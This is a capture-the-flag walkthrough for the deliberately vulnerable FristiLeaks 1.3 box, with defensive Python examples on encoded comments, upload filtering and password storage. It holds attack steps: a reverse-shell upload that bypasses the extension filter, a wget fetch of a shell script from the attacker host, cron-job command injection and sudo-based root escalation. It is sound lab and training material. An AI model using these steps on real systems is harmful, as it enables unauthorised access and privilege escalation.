FristiLeaks1.3 – CTF Walkthrough – Boot-To-Root

FristiLeaks 1.3 Walkthrough

FristiLeaks 1.3 is an easy/intermediate box that is designed to be targeted as a CTF as opposed to a traditional penetration test. The challenges are mainly focused on enumeration, reverse engineering and privilege escalation.

FristiLeaks1.3 link: https://www.vulnhub.com/entry/fristileaks-13,133/

Scanning

We will get started by performing port scanning on the target VM. Our objective is to find all services running on the target. The target VM has a local IP of 192.168.1.104.

nmap -sS -A -sV -O -p- 192.168.1.104

 

The nmap results show only one service running, an Apache web server running on port 80. Nmap also shows us that we have 3 disallowed entries in the robots.txt file.

Web application analysis

The web server displays a simple web-page.

We get the following image when trying to access the disallowed entries in the robots.txt file.

The source of the web-page does not reveal any important or useful information.

We can use dirbuster to perform some directory brute forcing; however, the results do not give us any new information.

Since we have not been able to uncover any directories with dirbuster, we can perform some fuzzing based on the information found on the homepage.

We can see the words “fristi” and “fristileaks” mentioned frequently on the web-page. We can try probing directories on the web server with these names, and we find that the directory “fristi” directs us to an admin login page.

http://192.168.1.104/fristi

The login system is simple and we can analyze the source to uncover the workings of the web-page.

The source of the login page reveals that the developer has left some comments regarding the workings and the content of the web-page.

In particular, there is a reference to the images on the web-page being encoded with the base64 algorithm. At the bottom of the page, we also find some commented-out base64 data.

We can decode the data and direct the output to a .txt file for analysis in Kali.

We can see that the decoded data has a PNG file header, which means that the decoded data is a PNG file. We can change the extension of the decoded data from .txt to .png, and when we open the PNG file we get an image with a string.
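The same check can be run by whoever owns the site before a page ships. The following is an added example, not code from the original walkthrough: it finds base64 blobs left in HTML comments and names what they decode to by file signature. The sample page and the 16-character token threshold are constructed assumptions.

```python
import base64
import re

# Leading bytes (magic numbers) of file formats worth flagging.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF87a": "gif",
    b"GIF89a": "gif", b"%PDF-": "pdf", b"PK\x03\x04": "zip",
}
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]+={0,2}")

def identify(data: bytes) -> str:
    """Name a decoded blob by its file signature instead of its extension."""
    return next((n for m, n in SIGNATURES.items() if data.startswith(m)), "unknown")

def base64_runs(comment: str):
    """Yield base64 candidates: a token of 16+ base64 characters plus the
    wrapped lines that follow it (heuristic: ordinary words are shorter)."""
    run = []
    for token in comment.split() + [""]:  # the empty token flushes the last run
        is_b64 = bool(B64_TOKEN.fullmatch(token))
        if is_b64 and (run or len(token) >= 16):
            run.append(token)
        elif run:
            yield "".join(run)
            run = []

def find_encoded_comments(html: str):
    """Return (file type, decoded size) for every base64 blob inside a comment."""
    findings = []
    for comment in COMMENT_RE.findall(html):
        for blob in base64_runs(comment):
            try:
                data = base64.b64decode(blob, validate=True)
            except ValueError:  # looked like base64 but does not decode
                continue
            findings.append((identify(data), len(data)))
    return findings

# Constructed sample: a page with one harmless note and one comment that
# hides a base64-encoded PNG stub, wrapped at 24 characters per line.
png_stub = b"\x89PNG\r\n\x1a\n" + bytes(40)
blob = base64.b64encode(png_stub).decode()
SAMPLE_HTML = (
    "<html><!-- TODO: images are inlined as base64 -->\n<body></body>\n<!--\n"
    + "\n".join(blob[i:i + 24] for i in range(0, len(blob), 24))
    + "\n-->\n</html>"
)
```

Running `find_encoded_comments` over rendered pages in a build or review step flags leftover encoded content before it reaches production.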

This appears to be a password for the admin login page. After further analysis of the login page source, we see a comment left by the developer with the username “eezeepz”.

We can now use the username and password combination to attempt to log in to the admin portal.

The credentials work and we are greeted with an image upload form that allows users to upload image files on the web server.

File upload vulnerability

We can try uploading a PHP reverse shell to the web server using the upload form. We can use the PHP reverse shell from pentestmonkey: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Because the upload form prevents the uploading of files with any extensions other than .png, .jpg and .gif, we will need to bypass the upload filter by renaming the reverse shell to shell.php.png. We specify the attacker IP and port accordingly.

We can now upload the file to the server and set up a netcat listener.

We are made aware of the location of the uploaded reverse shell. We can navigate to the file and execute it after we have set up our listener with netcat.

After execution, we are greeted with a reverse shell with no job control, logged in as the “apache” user.
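The bypass above works against a filter that looks only at the final extension, while Apache's mod_mime can act on any extension in a file name. The following is an added example, not the target's code: `weak_check` is an assumed model of the filter described above, `strict_check` is one hardened alternative, and all names and sample bytes are constructed.

```python
import os
import secrets

ALLOWED = {"png", "jpg", "gif"}
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}

def weak_check(filename: str) -> bool:
    """Assumed model of the filter: only the final extension is inspected."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED

def strict_check(filename: str, content: bytes):
    """Return a server-chosen storage name, or None if the upload is refused."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    # Require exactly one extension: "shell.php.png" carries two and is refused,
    # so no script extension can hide in front of the image extension.
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1].lower()
    # The content must start with the signature that matches the extension.
    if ext not in ALLOWED or not content.startswith(MAGIC[ext]):
        return None
    # Never keep the client's name: store under a random name plus the
    # validated extension.
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed sample inputs.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + bytes(16)
SCRIPT_SAMPLE = b"<?php echo 1; ?>"

if __name__ == "__main__":
    for name, body in [("shell.php.png", SCRIPT_SAMPLE),
                       ("logo.png", PNG_SAMPLE),
                       ("logo.png", SCRIPT_SAMPLE)]:
        print(name, "weak:", weak_check(name), "strict:", strict_check(name, body))
```

A signature check alone can be satisfied by a file that starts with image bytes, so the random storage name and an upload directory where the web server never executes scripts are the controls that matter most.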

Privilege escalation from apache to admin

The home directory contains 3 directories belonging to users “admin”, “eezeepz” and “fristigod”. We have sufficient permissions to access the “eezeepz” directory.

The directory contains various system binaries and a .txt file called “notes.txt”. The output reveals the following message.

The note reveals that we can execute various system binaries with admin privileges by adding the commands to a file called “runthis” in the /tmp directory, after which a cronjob will execute the commands automatically after 1 minute.

We can use this to automatically execute a reverse shell, which will elevate our privileges and give us access to the user “admin”. After exploring the system binaries on the system, we see that we have python installed, which means we can use a python reverse shell.

We will be using the python reverse shell from: https://highon.coffee/blog/reverse-shell-cheat-sheet/

After modifying the reverse shell, we can save it to a file called shell.py and then use wget to transfer it to the target.

We will download the reverse shell to the /tmp directory with wget. We will start SimpleHTTPServer on our host to set up a simple web server that we can use to provide the file.

python -m SimpleHTTPServer

We can now use wget to download the shell from our host to the target.

wget http://192.168.1.106:8000/shell.py

After we have successfully downloaded the shell, we can add the execution command to the “runthis” file in the /tmp directory. We can do this by using echo.

echo "/usr/bin/python /tmp/shell.py" > runthis

After we have added the command, we need to set up the listener with netcat. After a minute the command gets executed automatically and we get a reverse shell with user “admin”.

We can now access the user “admin” home directory where we find 3 interesting files.

  • cryptedpass.txt
  • cryptpass.py
  • whoisyourgodnow.txt

 

We discover that cryptedpass.txt and whoisyourgodnow.txt are files that contain encoded passwords. After inspecting the file cryptpass.py, we discover that it is a simple script that encodes strings into base64 first and then into rot13. We can reverse engineer the script to decode the encoded strings.

Reverse engineering python code

After reverse engineering the code, we can use the script to decode the encoded strings in cryptedpass.txt and whoisyourgodnow.txt.

We get the following strings after decoding.

  • LetThereBeFristi!
  • thisisalsopw123
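Base64 followed by rot13 involves no key, which is why the stored strings could be recovered. The following is an added example, not the cryptpass.py script (which the page does not reproduce): it follows the scheme as described in the text and sets it beside a salted, iterated hash that a system only needing to verify a password could store instead. The sample password and the round count are constructed assumptions.

```python
import base64
import codecs
import hashlib
import hmac
import os

def encode_as_described(secret: str) -> str:
    """base64 first, then rot13, following the description in the text."""
    b64 = base64.b64encode(secret.encode()).decode()
    return codecs.encode(b64, "rot13")

def decode_as_described(stored: str) -> str:
    """Undo both steps in reverse order. No key is needed at any point."""
    b64 = codecs.decode(stored, "rot13")
    return base64.b64decode(b64).decode()

def hash_password(password: str, salt=None, rounds: int = 200_000):
    """One-way alternative: salted PBKDF2-HMAC-SHA256, stored with its parameters."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt, rounds, digest

def verify_password(password: str, salt: bytes, rounds: int, digest: bytes) -> bool:
    """Recompute the hash and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(candidate, digest)

# Constructed sample value, not taken from the target.
SAMPLE = "Example-Passw0rd"

if __name__ == "__main__":
    stored = encode_as_described(SAMPLE)
    print("encoded:", stored)
    print("recovered without a key:", decode_as_described(stored))
    salt, rounds, digest = hash_password(SAMPLE)
    print("hash verifies:", verify_password(SAMPLE, salt, rounds, digest))
```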

Privilege escalation from admin to fristigod

After exploring the /etc/passwd file, we can see that we have a user called “fristigod” that we can switch to. We can use the decoded passwords to log in.

su fristigod

After trying out the 2 passwords, we discover that “LetThereBeFristi!” is the correct password and we are now logged in as user “fristigod”.

We can also access the home directory for the user “fristigod”; however, we discover that it does not contain any useful files. We still need to acquire root access and find the flag located in the root directory.

We can use the find command to search for files on the system that belong to the user “fristigod”.

find / -user fristigod

We discover that we have a directory that belongs to “fristigod” in the /var directory.

After further exploration of this directory and the .bash_history, we discover that we can use the user “fristi” to run root commands with a binary called doCom located in the /var/fristigod/.secret_admin_stuff directory.

We can therefore use the doCom binary to execute a reverse shell with root privileges.

Privilege escalation from fristigod to root

We can use a python reverse shell because we have access to the binaries and we can run it as root. We upload the shell to the /var/fristigod/.secret_admin_stuff directory and set up a listener.

After we have uploaded the shell, we can use the user “fristi” to execute the reverse shell by using the following command.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /usr/bin/python /var/fristigod/.secret_admin_stuff/shell.py

After executing the command, we will be prompted to enter the password for the user “fristigod”, after which the command will be executed and we will get a reverse shell with root privileges.

We can then browse to the /root directory and access the flag.

 

Success!
